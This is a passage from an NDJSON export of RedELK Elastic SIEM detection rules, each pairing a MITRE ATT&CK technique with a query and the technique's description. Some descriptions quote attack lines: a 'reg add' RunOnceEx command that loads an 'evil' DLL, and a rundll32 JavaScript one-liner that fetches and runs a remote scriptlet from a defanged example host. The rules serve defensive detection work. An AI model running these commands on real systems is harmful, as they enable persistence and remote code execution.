T1186","references":["https://attack.mitre.org/techniques/T1186","https://attack.mitre.org/techniques/T1055/013"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1186","name":"Process Doppelgänging","id":"T1186"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1055","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1055] Process Injection","query":"threat.technique.id: T1055","references":["https://attack.mitre.org/techniques/T1055"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1055","name":"Process Injection","id":"T1055"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1055","name":"Process Injection","id":"T1055"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.[1][2]\nThis is very similar to Thread Local Storage but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1093","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1093] Process Hollowing","query":"threat.technique.id: T1093","references":["https://attack.mitre.org/techniques/T1093","https://attack.mitre.org/techniques/T1055/012"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1093","name":"Process Hollowing","id":"T1093"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.[1] Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from Query Registry during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1012","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1012] Query Registry","query":"threat.technique.id: T1012","references":["https://attack.mitre.org/techniques/T1012"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1012","name":"Query Registry","id":"T1012"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts [1]. In macOS and OS X, this is now a deprecated mechanism in favor of Launch Agent and Launch Daemon but is currently still used.\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1163","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1163] Rc.common","query":"threat.technique.id: T1163","references":["https://attack.mitre.org/techniques/T1163","https://attack.mitre.org/techniques/T1037/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1163","name":"Rc.common","id":"T1163"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist.\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine [1].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1164","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1164] Re-opened Applications","query":"threat.technique.id: T1164","references":["https://attack.mitre.org/techniques/T1164","https://attack.mitre.org/techniques/T1547/007"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1164","name":"Re-opened Applications","id":"T1164"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Redundant Access","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1108","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1108] Redundant Access","query":"threat.technique.id: T1108","references":["https://attack.mitre.org/techniques/T1108","https://attack.mitre.org/techniques/T1136"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1108","name":"Redundant Access","id":"T1108"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1108","name":"Redundant Access","id":"T1108"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. [1] These programs will be executed under the context of the user and will have the account's associated permissions level.\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\nThe following run keys are created by default on Windows systems: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. [2] For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" [3]\nThe following Registry keys can be used to set startup folder items for persistence: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\nThe following Registry keys can control automatic startup of services during boot: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1060","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1060] Registry Run Keys / Startup Folder","query":"threat.technique.id: T1060","references":["https://attack.mitre.org/techniques/T1060","https://attack.mitre.org/techniques/T1547/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1060","name":"Registry Run Keys / Startup Folder","id":"T1060"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. [1] [2]\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. [3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1121","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1121] Regsvcs/Regasm","query":"threat.technique.id: T1121","references":["https://attack.mitre.org/techniques/T1121","https://attack.mitre.org/techniques/T1218/009"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1121","name":"Regsvcs/Regasm","id":"T1121"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1121","name":"Regsvcs/Regasm","id":"T1121"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. [1]\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. [2] This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. [3] [4]\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1117","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1117] Regsvr32","query":"threat.technique.id: T1117","references":["https://attack.mitre.org/techniques/T1117","https://attack.mitre.org/techniques/T1218/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1117","name":"Regsvr32","id":"T1117"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1117","name":"Regsvr32","id":"T1117"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. [1]\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. [2] [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1219","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1219] Remote Access Tools","query":"threat.technique.id: T1219","references":["https://attack.mitre.org/techniques/T1219"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1219","name":"Remote Access Tools","id":"T1219"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).[1]\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1076","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1076] Remote Desktop Protocol","query":"threat.technique.id: T1076","references":["https://attack.mitre.org/techniques/T1076","https://attack.mitre.org/techniques/T1021/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1076","name":"Remote Desktop Protocol","id":"T1076"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1105","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1105] Remote File Copy","query":"threat.technique.id: T1105","references":["https://attack.mitre.org/techniques/T1105"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1105","name":"Remote File Copy","id":"T1105"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1105","name":"Remote File Copy","id":"T1105"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1021","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1021] Remote Services","query":"threat.technique.id: T1021","references":["https://attack.mitre.org/techniques/T1021"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1021","name":"Remote Services","id":"T1021"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net. Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.\nWithin IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.[1][2] Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.[3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1018","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1018] Remote System Discovery","query":"threat.technique.id: T1018","references":["https://attack.mitre.org/techniques/T1018"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1018","name":"Remote System Discovery","id":"T1018"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1091","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1091] Replication Through Removable Media","query":"threat.technique.id: T1091","references":["https://attack.mitre.org/techniques/T1091"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1091","name":"Replication Through Removable Media","id":"T1091"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1091","name":"Replication Through Removable Media","id":"T1091"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability.\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.[1] Servers and cloud-based[2] systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1496","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1496] Resource Hijacking","query":"threat.technique.id: T1496","references":["https://attack.mitre.org/techniques/T1496"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1496","name":"Resource Hijacking","id":"T1496"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1536","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1536] Revert Cloud Instance","query":"threat.technique.id: T1536","references":["https://attack.mitre.org/techniques/T1536","https://attack.mitre.org/techniques/T1578/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1536","name":"Revert Cloud Instance","id":"T1536"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. [1]\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. [2] Rootkits have been seen for Windows, Linux, and Mac OS X systems. [3] [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1014","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1014] Rootkit","query":"threat.technique.id: T1014","references":["https://attack.mitre.org/techniques/T1014"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1014","name":"Rootkit","id":"T1014"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\nRundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. [1]\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1085","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1085] Rundll32","query":"threat.technique.id: T1085","references":["https://attack.mitre.org/techniques/T1085","https://attack.mitre.org/techniques/T1218/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1085","name":"Rundll32","id":"T1085"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1085","name":"Rundll32","id":"T1085"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify systems in order to 